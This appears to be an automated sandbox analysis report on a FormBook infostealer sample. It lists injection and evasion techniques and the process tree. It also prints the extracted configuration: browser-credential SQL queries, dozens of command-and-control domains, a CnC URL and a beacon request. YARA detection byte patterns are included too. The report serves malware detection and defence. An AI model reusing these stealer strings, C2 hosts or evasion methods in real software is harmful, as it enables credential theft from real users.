
Analysis Report BLESSINGS.exe

Overview

General Information

Sample Name: BLESSINGS.exe
Analysis ID: 339345
MD5: 30cb872994e8a0a4a635b06bfbe38006
SHA1: 02e502ef79ea251f04fa9e02dd1d7639e59c7ddc
SHA256: d0b62e121a89ba8e44b4b71a887dd80df1e4fc746dabc200854622e9ed1fa8cb
Tags: exe

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • BLESSINGS.exe (PID: 4588 cmdline: 'C:\Users\user\Desktop\BLESSINGS.exe' MD5: 30CB872994E8A0A4A635B06BFBE38006)
    • AddInProcess32.exe (PID: 6264 cmdline: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6744 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6784 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc2", "KEY1_OFFSET 0x1d510", "CONFIG SIZE : 0xf7", "CONFIG OFFSET 0x1d615", "URL SIZE : 33", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x1004744a", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70d3", "0x9f715026", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012172", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014c1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", 
"0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", 
"encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "strahlenschutz.digital", "soterppe.com", "wlw-hnlt.com", "topheadlinetowitness-today.info", "droriginals.com", "baculatechie.online", "definity.finance", "weddingmustgoon.com", "ludisenofloral.com", "kenniscourtureconsignments.com", "dl888.net", "singledynamics.com", "internetmarkaching.com", "solidconstruct.site", "ip-freight.com", "11sxsx.com", "incomecontent.com", "the343radio.com", "kimberlygoedhart.net", "dgdoughnuts.net", "vivethk.com", "st-reet.com", "luxusgrotte.com", "hareland.info", "fitdramas.com", "shakahats.com", "cositasdepachecos.com", "lhc965.com", "5hnjy.com", "zoommedicaremeetings.com", "bebywye.site", "ravenlewis.com", "avia-sales.xyz", "screwtaped.com", "xaustock.com", "hongreng.xyz", "lokalised.com", "neosolutionsllc.com", "ecandkllc.com", "sistertravelalliance.com", "brotherhoodoffathers.com", "mybestme.store", "vigilantdis.com", "sqatzx.com", "kornteengoods.com", "miamiwaterworld.com", "mywillandmylife.com", "novergi.com", 
"eaglesnestpropheticministry.com", "sterlworldshop.com", "gabriellagullberg.com", "toweroflifeinc.com", "tiendazoom.com", "dividupe.com", "szyulics.com", "theorangepearl.com", "hotvidzhub.download", "asacal.com", "systemedalarmebe.com", "margosbest.com", "kathymusic.com", "quintred.com", "mad54.art", "simplification.business", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.registeredagentfirm.com/jqc/\u0000"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings (listed below each row)
00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further memory dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings (listed below each row)
8.2.AddInProcess32.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
8.2.AddInProcess32.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.2.AddInProcess32.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
8.2.AddInProcess32.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
8.2.AddInProcess32.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked PE entry not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 8.2.AddInProcess32.exe.400000.0.unpack; Malware Configuration Extractor: FormBook (the extracted configuration is the one listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: BLESSINGS.exe; Virustotal: Detection: 45%
Source: BLESSINGS.exe; ReversingLabs: Detection: 15%
Yara detected FormBook
Source: Yara match; File source: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.475413871.0000000001240000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.686287687.0000000000D10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.427502177.0000000004747000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.427774356.00000000048B2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.686153240.0000000000840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.475179595.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: BLESSINGS.exe; Joe Sandbox ML: detected
Source: 8.2.AddInProcess32.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: BLESSINGS.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: BLESSINGS.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, raserver.exe, 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: AddInProcess32.exe, raserver.exe
Source: Binary string: RAServer.pdb source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000008.00000002.474933726.0000000000B62000.00000002.00020000.sdmp, raserver.exe, 0000000F.00000002.688878285.0000000004A2F000.00000004.00000001.sdmp, AddInProcess32.exe.1.dr
Source: Binary string: RAServer.pdbGCTL source: AddInProcess32.exe, 00000008.00000002.475617177.0000000001290000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 0000000A.00000000.460948394.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\BLESSINGS.exe; Code function: 4x nop then jmp 0117F696h
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe; Code function: 4x nop then pop edi (reported 5 times)
Source: C:\Windows\SysWOW64\raserver.exe; Code function: 4x nop then pop edi (reported 5 times)
Source: global traffic; HTTP traffic detected: GET /jqc/?CZ=GWrWoWa4zZjFn82G+0nNh4GvWCUBG1oNYElUd01Cxs8I6tEnxSPY6FoFnAuUsLE3P+RrU5FSoA==&sv28R0=gnKTZf8P HTTP/1.1; Host: www.quintred.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii: (none)
Source: Joe Sandbox View; IP Address: 91.195.241.137
Source: Joe Sandbox View; ASN Name: SEDO-ASDE
Source: unknown; DNS traffic detected: queries for: www.toweroflifeinc.com
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: BLESSINGS.exe, 00000001.00000003.420634051.00000000014F8000.00000004.00000001.sdmp; String found in binary or memory: http://ns.adobe.c/g
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.11sxsx.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.11sxsx.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.11sxsx.com/jqc/www.sterlworldshop.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.11sxsx.comReferer:
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.asacal.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.asacal.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.asacal.com/jqc/:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.asacal.comReferer:
Source: explorer.exe, 0000000A.00000002.686806535.000000000095C000.00000004.00000020.sdmp; String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.cositasdepachecos.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.cositasdepachecos.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.cositasdepachecos.com/jqc/www.margosbest.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.cositasdepachecos.comReferer:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.droriginals.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.droriginals.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.droriginals.com/jqc/www.kornteengoods.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.droriginals.comReferer:
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.gabriellagullberg.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.gabriellagullberg.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.gabriellagullberg.com/jqc/www.cositasdepachecos.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.gabriellagullberg.comReferer:
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.hotvidzhub.download
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.hotvidzhub.download/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.hotvidzhub.download/jqc/www.internetmarkaching.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.hotvidzhub.downloadReferer:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.internetmarkaching.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.internetmarkaching.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.internetmarkaching.com/jqc/www.gabriellagullberg.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.internetmarkaching.comReferer:
Source: explorer.exe, 0000000A.00000000.459811894.000000000B1A6000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.kornteengoods.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.kornteengoods.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.kornteengoods.com/jqc/www.screwtaped.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.kornteengoods.comReferer:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.margosbest.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.margosbest.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.margosbest.com/jqc/www.the343radio.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.margosbest.comReferer:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.novergi.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.novergi.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.novergi.com/jqc/www.hotvidzhub.download
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.novergi.comReferer:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.quintred.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.quintred.com/jqc/
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.quintred.com/jqc/www.novergi.com
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.quintred.comReferer:
Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmp; String found in binary or memory: http://www.registeredagentfirm.com
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/
          Source: explorer.exe, 0000000A.00000002.702072339.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.registeredagentfirm.com/jqc/www.asacal.com
